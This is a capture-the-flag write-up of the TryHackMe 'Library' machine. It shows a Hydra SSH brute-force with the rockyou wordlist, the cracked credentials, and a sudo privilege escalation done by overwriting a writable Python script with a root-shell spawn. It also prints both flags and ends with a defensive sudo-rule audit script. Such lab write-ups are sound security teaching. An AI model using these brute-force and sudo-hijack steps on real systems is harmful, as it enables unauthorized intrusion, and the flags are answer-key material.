Library Writeup

Date: 13-06-2025 | Platform: [TryHackMe.com] | Difficulty: [Easy]

Overview

This challenge is a boot2root machine created for the FIT and BSides Guatemala CTF.

Initial Reconnaissance

Started by performing a basic port scan to identify open services:

nmap -sC -sV -A 10.10.10.10

The scan showed two open ports: a web server on port 80 and SSH (details below).

Remember to check robots.txt on the website!

Web Application Analysis

Identified a website running on port 80 and an open SSH port.

Found a user named meliodas associated with articles on the website.

Note: User: meliodas

Visited robots.txt:

User-agent: rockyou

This provided a hint to use the rockyou.txt wordlist for brute-forcing.

Exploitation

SSH Brute-Force with Hydra

Used Hydra to brute-force the password for the user meliodas:

hydra -l meliodas -P rockyou.txt 10.10.10.10 ssh -t 5

Successfully obtained credentials:

Username: meliodas
Password: iloveyou1

Logged in via SSH:

ssh meliodas@10.10.10.10

Verified access:

whoami
id
ls -la

The listing shows bak.py and user.txt in the home directory.

Flag Capture: user.txt

Located and read the user flag:

cat user.txt

User Flag:
6d488cbb3f111d135722c33cb635f4ec

Flag Capture: root.txt

Checked for sudo privileges:

sudo -l

Found that the user can run /usr/bin/python /home/meliodas/bak.py as root without a password, indicating a potential privilege escalation vector.

Inspected the bak.py file:

cat bak.py
ls -l bak.py

Confirmed that bak.py is owned and writable by the meliodas user yet executed as root via sudo, a misconfiguration exploitable with the techniques listed on GTFOBins.

Replaced bak.py with a malicious script to spawn a root shell, leveraging Python's ability to execute arbitrary commands (as noted in GTFOBins):

rm bak.py
touch bak.py
nano bak.py

Added the following code to spawn an interactive root shell:

import pty; pty.spawn("/bin/bash")

Executed the script with sudo, exploiting the misconfigured sudo rule:

sudo /usr/bin/python /home/meliodas/bak.py

Obtained a root shell and verified:

whoami

Navigated to the root directory and read the root flag:

cd /root
ls -la
cat root.txt

Root Flag:
e8c8c6c256c35515d1d344ee0488c617

Lessons Learned

Always check robots.txt for potential hints or disallowed entries.

Brute-forcing credentials with common wordlists like rockyou.txt can be effective for weak passwords.

Privilege escalation can be achieved by modifying files that are writable by a low-privileged user but executed with elevated permissions.

Regularly audit sudo permissions to prevent unauthorized access to sensitive scripts.
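As an added example (not part of this writeup), here is a small Python audit of the kind the last lesson and the bak.py finding call for: it parses "sudo -l" output such as the rule above and flags NOPASSWD script arguments that the sudoer can edit, or can replace because the containing directory is writable, which is all the rm/touch sequence used earlier actually needed. The paths, uids and the FAKE_FS snapshot are constructed for the demo; on a real host pass the default os.stat instead.

```python
import os, re, stat

# One "sudo -l" command entry, e.g. "(root) NOPASSWD: /usr/bin/python /home/meliodas/bak.py"
SUDO_RULE = re.compile(r"\((?P<runas>[^)]+)\)\s+(?:NOPASSWD:\s*)?(?P<cmd>/.+)")

def parse_sudo_rules(sudo_l_output):
    """Return (run-as user, argv) for every command entry in 'sudo -l' output."""
    return [(m.group("runas"), m.group("cmd").split()) for m in
            map(SUDO_RULE.match, (line.strip() for line in sudo_l_output.splitlines())) if m]

def mode_writable(st, uid, gid):
    """Owner, group or world write bit that applies to this uid/gid (root is not special-cased)."""
    return bool((st.st_uid == uid and st.st_mode & stat.S_IWUSR)
                or (st.st_gid == gid and st.st_mode & stat.S_IWGRP)
                or st.st_mode & stat.S_IWOTH)

def audit_rule(argv, uid, gid, stat_fn=os.stat):
    """Flag script arguments the sudoer can edit, or replace because the directory is writable."""
    findings = []
    for arg in argv[1:]:  # argv[0] is the interpreter or binary itself
        if not arg.startswith("/"):
            continue
        try:
            file_st, dir_st = stat_fn(arg), stat_fn(os.path.dirname(arg))
        except (OSError, KeyError):  # KeyError lets a dict stand in for the filesystem
            continue
        if mode_writable(file_st, uid, gid):
            findings.append((arg, "script writable by sudoer"))
        elif mode_writable(dir_st, uid, gid):
            findings.append((arg, "directory writable: script can be deleted and recreated"))
    return findings

def fake_stat(uid, gid, mode):
    return os.stat_result((mode, 0, 0, 1, uid, gid, 0, 0, 0, 0))  # only uid/gid/mode matter
FAKE_FS = {  # constructed host snapshot; uid/gid 1000 is the sudoer
    "/home/meliodas": fake_stat(1000, 1000, 0o040755),
    "/home/meliodas/bak.py": fake_stat(1000, 1000, 0o100644),  # user-owned, as in the writeup
    "/opt": fake_stat(0, 0, 0o040755),
    "/opt/backup.py": fake_stat(0, 0, 0o100644),  # root-owned in a root-owned dir: no finding
    "/srv": fake_stat(1000, 1000, 0o040755),
    "/srv/rotate.py": fake_stat(0, 0, 0o100644),  # root-owned, but its directory is user-owned
}

def demo():
    """Audit three constructed NOPASSWD rules for uid/gid 1000 against FAKE_FS."""
    output = ("    (root) NOPASSWD: /usr/bin/python /home/meliodas/bak.py\n"
              "    (root) NOPASSWD: /usr/bin/python /opt/backup.py\n"
              "    (root) NOPASSWD: /usr/bin/python /srv/rotate.py\n")
    return [f for _, argv in parse_sudo_rules(output)
            for f in audit_rule(argv, 1000, 1000, FAKE_FS.__getitem__)]
```

The fix on the real host is the same in both flagged cases: the script and its directory must be owned by root and not writable by the sudoer, or the sudo rule should be removed.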

Tools Used